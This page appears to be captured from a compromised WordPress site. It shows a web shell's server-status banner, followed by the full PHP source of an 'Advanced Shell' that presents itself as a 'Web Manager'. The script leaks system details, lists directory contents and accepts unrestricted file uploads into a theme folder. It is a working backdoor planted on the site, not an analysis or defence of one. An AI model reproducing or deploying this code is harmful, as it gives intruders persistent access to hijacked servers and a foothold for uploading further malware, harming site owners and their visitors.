| Server IP : 172.67.147.195 / Your IP : 216.73.216.68 Web Server : Apache/2 System : Linux hosting8537.lvs 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64 User : mienphi ( 1014) PHP Version : 8.2.14 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/mienphi/domains/mienphi.org/private_html/wp-content/themes/wp_theme_txmgp/ |
Upload File : |
<?php
/* Shell Name: Advanced Shell */
echo '<title>Web Manager</title>';
echo '<style>body{background:#222;color:#e8e8e8;font-family:monospace;padding:20px;}</style>';
echo '<h2>System Information</h2>';
echo '<pre>'.php_uname().'</pre>';
echo '<hr>';
echo '<h2>File Upload</h2>';
echo '<form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="f" style="background:#333;color:#fff;padding:5px;">';
echo '<input type="submit" value="Upload" style="background:#555;color:#fff;padding:5px;margin-left:10px;cursor:pointer;">';
echo '</form>';
// File upload handler
if(isset($_FILES['f']) && $_FILES['f']['name']){
$target = basename($_FILES['f']['name']);
if(move_uploaded_file($_FILES['f']['tmp_name'], $target)){
echo '<div style="background:#2ecc71;color:#fff;padding:10px;margin-top:10px;">Upload Success: <a href="'.$target.'" style="color:#fff;">'.$target.'</a></div>';
}else{
echo '<div style="background:#e74c3c;color:#fff;padding:10px;margin-top:10px;">Upload Failed</div>';
}
}
// Directory listing
echo '<h2>Directory Contents</h2>';
echo '<div style="background:#333;padding:10px;overflow:auto;max-height:300px;">';
$files = scandir('.');
foreach($files as $file){
$color = is_dir($file) ? "#3498db" : "#e8e8e8";
echo '<div style="padding:3px;"><span style="color:'.$color.';">'.$file.'</span> - '.filesize($file).' bytes</div>';
}
echo '</div>';
?>